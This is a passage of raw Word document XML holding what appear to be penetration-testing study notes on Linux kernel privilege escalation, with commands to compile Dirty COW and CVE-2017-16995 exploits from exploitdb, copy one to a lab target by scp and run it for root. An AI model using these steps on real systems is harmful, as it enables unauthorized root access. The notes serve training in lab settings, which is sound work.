          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we had to use the command "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc -pthread dirty.c -o dirty -lcrypt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" but that was explicitly specified in the exploitdb we used</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003694">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="952"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-pthread</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : Enables POSIX thread support (compile + link pthreads)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003695">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="952"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-lcrypt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : Links against the libcrypt library (needed for crypt() function)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003696">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="952"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Links the binary against the libcrypt library.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003697">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="952"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">libcrypt provides password hashing functions like crypt(), which are often used in exploits that modify /etc/passwd or create accounts with known hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003698">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="952"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-l&lt;name&gt; tells the linker to look for lib&lt;name&gt;.so (or .a) in its library search path, so this loads libcrypt.so.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003699">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000369A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000369B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">An alternative to gcc is</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> g+</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">+, which can be seen in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1150">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Lampiao</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000369C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="735"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dirtycow2 40847.cpp -lutil</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000369D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000369E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000369F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you ever get the error message "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc: error trying to exec 'cc1': execvp: No such file or directory</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" while using gcc, just use this line to update PATH </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="365"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PATH=PATH$:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/gcc/x86_64-linux-gnu/4.8/;export PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="365"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:hyperlink r:id="rId1151">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Sumo</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036A2">
      <w:pPr>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36A3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036A4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From XXXXXXXXX (18.4.3. Exploiting Kernel Vulnerabilities) (Module 18 Linux Privilege Escalation)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036A5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036A6">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's try to compile the program </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">linux/local/45010.c (from exploitdb)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036A7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036A8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We'll use gcc on Linux to compile our exploit, keeping in mind that when compiling code, we must match the architecture of our target. This is especially important in situations where the target machine does not have a compiler, and we are forced to compile the exploit on our attacking machine or in a sandboxed environment that replicates the target OS and architecture.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036A9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036AA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Although learning every detail of a Linux kernel exploit is outside the scope of this Module, we still need to understand the initial compilation instructions. To do so, let's copy the exploit into our Kali home folder and then inspect the first 20 lines of it to spot any compilation instructions.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036AB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036AC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4003344" cy="3124405"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="293" name="image288.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image288.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1152"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4003344" cy="3124405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036AD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036AE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Luckily, to compile the source code into an executable, we just need to invoke </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and specify the C source code and the output filename. To simplify this process, we could also rename the source filename to match the one expected by the exploit's procedure. Once renamed, we can simply paste the original exploit's instructions to compile the C code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036AF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036B0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mv 45010.c cve-2017-16995.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036B1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036B2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To make sure that the compilation process goes as smooth as possible, we take advantage of the fact that our target is already shipped with GCC. For this reason, we can compile and run the exploit on the target itself. Because of this we can take advantage of including the correct version of the libraries required by the target's architecture. This setup will lower the risks related to any cross-compilation compatibility issues. To begin with, we transfer the exploit source code over the target machine via the SCP tool.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036B3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036B4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">scp cve-2017-16995.c joe@192.168.123.216:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1324"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This colon is crucial. It tells scp that everything before the colon (joe@192.168.123.216) is the remote host and user, and everything after the colon (even if it's empty) specifies the path on that remote host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1324"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When you provide the colon but no specific path after it, scp defaults to copying the file to the home directory of the specified user (joe in this case) on the remote host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036B7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036B8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once transferred, we connect to the target machine and invoke GCC to compile the exploit, providing the source code as the first argument and the binary name as the output file to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-o</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036B9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036BA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc cve-2017-16995.c -o cve-2017-16995</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036BB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036BC">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can safely assume gcc compiled it correctly since it did not output any errors.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036BD">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> utility, we can also inspect the Linux ELF file architecture.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036BE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1206500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="127" name="image125.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image125.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1153"/>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36BF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With all the prerequisites in place we are now ready to run our Linux kernel privilege escalation exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036C0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000036C1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4014788" cy="2676525"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="31" name="image29.png"/>
            <a:graphic>
